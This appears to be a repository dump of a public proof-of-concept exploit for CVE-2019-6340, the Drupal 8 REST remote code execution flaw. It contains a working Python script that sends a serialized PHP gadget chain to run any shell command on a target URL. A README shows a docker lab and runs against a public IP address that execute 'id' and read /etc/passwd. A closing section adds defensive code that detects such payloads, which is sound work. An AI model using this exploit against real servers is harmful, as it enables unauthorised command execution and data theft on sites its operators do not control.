├── Drupal8.jpg
├── CVE-2019-6340.jpg
├── CVE-2019-6340-burp.jpg
├── CVE-2019-6340.py
└── README.md

/Drupal8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/Drupal8.jpg
--------------------------------------------------------------------------------

/CVE-2019-6340.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/CVE-2019-6340.jpg
--------------------------------------------------------------------------------

/CVE-2019-6340-burp.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/CVE-2019-6340-burp.jpg
--------------------------------------------------------------------------------

/CVE-2019-6340.py:
--------------------------------------------------------------------------------
import json
import re
import sys

import requests

BANNER = r'''
CVE-2019-6340

Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340

Example: python CVE-2019-6340.py url cmd
'''

# Serialized PHP gadget chain: GuzzleHttp\Psr7\FnStream::__destruct() calls
# _fn_close, i.e. HandlerStack::resolve(), which wraps the "handler" string in
# the one stack entry, system(), and so runs the command.  Drupal 8's REST
# module hands the link field's "options" value to unserialize(), which is
# what SA-CORE-2019-003 fixed.
# PHP strings are length-prefixed, so %d must be the byte length of %s
# (s:2:"id"; for the command `id`); otherwise unserialize() rejects the blob.
GADGET = (
    'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{'
    's:33:"\x00GuzzleHttp\\Psr7\\FnStream\x00methods";a:1:{'
    's:5:"close";a:2:{'
    'i:0;O:23:"GuzzleHttp\\HandlerStack":3:{'
    's:32:"\x00GuzzleHttp\\HandlerStack\x00handler";s:%d:"%s";'
    's:30:"\x00GuzzleHttp\\HandlerStack\x00stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}'
    's:31:"\x00GuzzleHttp\\HandlerStack\x00cached";b:0;}'
    'i:1;s:7:"resolve";}}'
    's:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
)

HEADERS = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    'Connection': "close",
    'Content-Type': "application/hal+json",
    'Accept': "*/*",
    'Cache-Control': "no-cache",
}


def build_payload(cmd):
    """hal+json body with the command embedded in the serialized gadget."""
    options = GADGET % (len(cmd.encode("utf-8")), cmd)
    return json.dumps({
        "link": [{"value": "link", "options": options}],
        "_links": {"type": {"href": "http://localhost/rest/type/shortcut/default"}},
    })


def main():
    print(BANNER)
    if len(sys.argv) != 3:
        sys.exit("Usage: python CVE-2019-6340.py url cmd")
    url, cmd = sys.argv[1], sys.argv[2]
    vuln_url = url.rstrip("/") + "/node/"
    print(">>>Vuln Url=%s" % vuln_url)

    # To watch the request in Burp, export HTTP_PROXY=http://127.0.0.1:8080;
    # requests honours the proxy environment variables.
    response = requests.post(vuln_url, params={"_format": "hal_json"},
                             data=build_payload(cmd), headers=HEADERS)

    # A vulnerable target still answers 403 from the shortcut access check,
    # with the command output appended after the JSON error document.
    if response.status_code == 403 and "u0027access" in response.text:
        print("\n>>>>CVE-2019-6340 RCE Vuln Exists!\n")
        m = re.search(r'permissions\."\}(.*)', response.text, re.S)
        print(m.group(1) if m else response.text)
    else:
        print("No Vuln Exists!")


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# CVE-2019-6340 Drupal8's REST RCE, SA-CORE-2019-003

### 0x01 docker search CVE-2019-6340
```
NAME                       DESCRIPTION                              STARS   OFFICIAL   AUTOMATED
knqyf263/cve-2019-6340     Environment for CVE-2019-6340 (Drupal)   0
cved/cve-2019-6340         cve-2019-6340                            0
```
### 0x02 docker pull knqyf263/cve-2019-6340

```
Using default tag: latest
latest: Pulling from knqyf263/cve-2019-6340
6ae821421a7d: Pull complete
08f3d19635b0: Pull complete
dc8a54b8000b: Pull complete
b2c1d103db99: Pull complete
edfa752aa38a: Pull complete
583d37cbf2f0: Pull complete
c7846a240c1d: Pull complete
d8f9f0fd02fe: Pull complete
01d43e56770d: Pull complete
dbe439e2caf9: Pull complete
3de30e1f5211: Pull complete
209dd35ef060: Pull complete
3d97847926b1: Pull complete
d0da67360f39: Pull complete
30efc6ba9a1f: Pull complete
a7bf83e4c4c3: Pull complete
f4e7678b40a5: Pull complete
9c786cb4409c: Pull complete
e2a8985b3b6b: Pull complete
e6b727cd2f54: Pull complete
afc99ae05ad1: Pull complete
5db8cf1431d4: Pull complete
7b90e0b5c074: Pull complete
6f123bc91ad7: Pull complete
00456a0879a4: Pull complete
5ee332aeb757: Pull complete
5a6951f3933f: Pull complete
6733bf98ddeb: Pull complete
Digest: sha256:af74572eca0aa665507cb1dd536deb18ec1c17ac3ca5757b9cdf8f7adb174876
Status: Downloaded newer image for knqyf263/cve-2019-6340:latest
```
### 0x03 docker run -d -p80:80 --name jas502n knqyf263/cve-2019-6340

`1ed1e2278904d06f5b8c5d5fda677b393e16414bbf0bd93f5d8f359d76360e49`
![](./Drupal8.jpg)

### 0x04 python CVE-2019-6340.py url cmd

The script substitutes the command into the serialized Guzzle gadget as a length-prefixed PHP string, `s:2:\"id\";` for `id`. The length must equal the command's byte length; otherwise PHP's unserialize() rejects the payload and nothing runs.

![](./CVE-2019-6340.jpg)

```
python CVE-2019-6340.py http://47.75.157.227 "id"

Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340

Example: python CVE-2019-6340.py url cmd

>>>Vuln Url=http://47.75.157.227/node/

>>>>CVE-2019-6340 RCE Vuln Exists!

uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

```
python CVE-2019-6340.py http://47.75.157.227 "cat /etc/passwd"

Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340

Example: python CVE-2019-6340.py url cmd

>>>Vuln Url=http://47.75.157.227/node/

>>>>CVE-2019-6340 RCE Vuln Exists!

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

```

##### burpsuite request
![](./CVE-2019-6340-burp.jpg)
```
POST /node/?_format=hal_json HTTP/1.1
Host: 47.75.157.227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Connection: keep-alive
Content-Type: application/hal+json
Accept: */*
Cache-Control: no-cache
Content-Length: 626

{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://localhost/rest/type/shortcut/default"
    }
  }
}

```
##### burpsuite response

The 403 comes from the shortcut access check, but the `id` output appended after the JSON error body shows the gadget ran anyway.

```
HTTP/1.1 403 Forbidden
Date: Mon, 27 May 2019 19:12:21 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.15
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Vary:
X-Generator: Drupal 8 (https://www.drupal.org)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hal+json
Content-Length: 239

{"message":"The shortcut set must be the currently displayed set for the user and the user must have \u0027access shortcuts\u0027 AND \u0027customize shortcut links\u0027 permissions."}uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### 0x05 References
`https://github.com/knqyf263/CVE-2019-6340`
`https://www.ambionics.io/blog/drupal8-rce`
`https://gist.githubusercontent.com/theMiddleBlue/22c6908d955519bd23b3d0b349badcc5/raw/af5746d4755c9e4cca6d8ef15334f81027c524df/drupal8rce.json`
`https://www.drupal.org/sa-core-2019-003`
--------------------------------------------------------------------------------
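The Burp exchange above, examined offline. This is an added example, not code from the jas502n repository: it embeds the captured hal+json request body and the 403 response body from the page as constructed samples, recovers the command output the way the PoC does (by locating the end of the JSON error document rather than with a regex), and flags any string field in a Drupal REST write that starts a serialized PHP object. The detector walks the whole document, so it generalizes past the link field's `options` to the other field types SA-CORE-2019-003 covers. The benign request body, the `$.path` notation and the function names are assumptions made for the example.

```python
import json
import re

# Request body from the Burp capture on this page (constructed sample, copied
# verbatim): link[0].options carries a serialized GuzzleHttp\Psr7\FnStream.
CAPTURED_REQUEST = r'''{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {"type": {"href": "http://localhost/rest/type/shortcut/default"}}
}'''

# Body of the captured 403 response: the JSON error, then system()'s output.
CAPTURED_RESPONSE = (
    '{"message":"The shortcut set must be the currently displayed set for the user '
    'and the user must have \\u0027access shortcuts\\u0027 AND \\u0027customize '
    'shortcut links\\u0027 permissions."}'
    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
)

# A legitimate link write (constructed, assumed shape): options is a JSON
# array, never a PHP-serialized string.
BENIGN_REQUEST = ('{"link":[{"uri":"internal:/","options":[]}],'
                  '"_links":{"type":{"href":"http://localhost/rest/type/node/page"}}}')

# Serialized PHP object header, O:<len>:"<class>":<nprops>:{ (C: for classes
# with a custom serializer), at the start of a string or after a separator.
PHP_OBJECT = re.compile(r'(?:^|[;{:])[OC]:\d+:"[^"]+":\d+:\{')


def extract_output(status, body):
    """Command output a vulnerable target appends after the 403 JSON error,
    or None when the response does not match the PoC's success test."""
    if status != 403 or "u0027access" not in body:
        return None
    body = body.lstrip()
    _, end = json.JSONDecoder().raw_decode(body)  # index just past the JSON
    return body[end:].strip()


def find_php_objects(node, path="$"):
    """Yield (json_path, value) for every string anywhere in a decoded JSON
    document that starts a serialized PHP object."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from find_php_objects(value, "%s.%s" % (path, key))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_php_objects(value, "%s[%d]" % (path, i))
    elif isinstance(node, str) and PHP_OBJECT.search(node):
        yield path, node


def suspicious_rest_write(method, query, content_type, body):
    """JSON paths of serialized-PHP strings in a Drupal REST write, [] if
    clean. Only POST/PATCH/PUT bodies in a JSON-based format are inspected."""
    if method.upper() not in ("POST", "PATCH", "PUT"):
        return []
    if "_format=hal_json" not in query and "json" not in content_type:
        return []
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    return [path for path, _ in find_php_objects(doc)]
```

`extract_output(403, CAPTURED_RESPONSE)` returns the `uid=33(www-data) ...` line, and `suspicious_rest_write("POST", "_format=hal_json", "application/hal+json", CAPTURED_REQUEST)` returns `["$.link[0].options"]` while the benign body yields `[]`. Using `raw_decode` instead of the PoC's `permissions."}` regex means the split works for whatever error message the target returns.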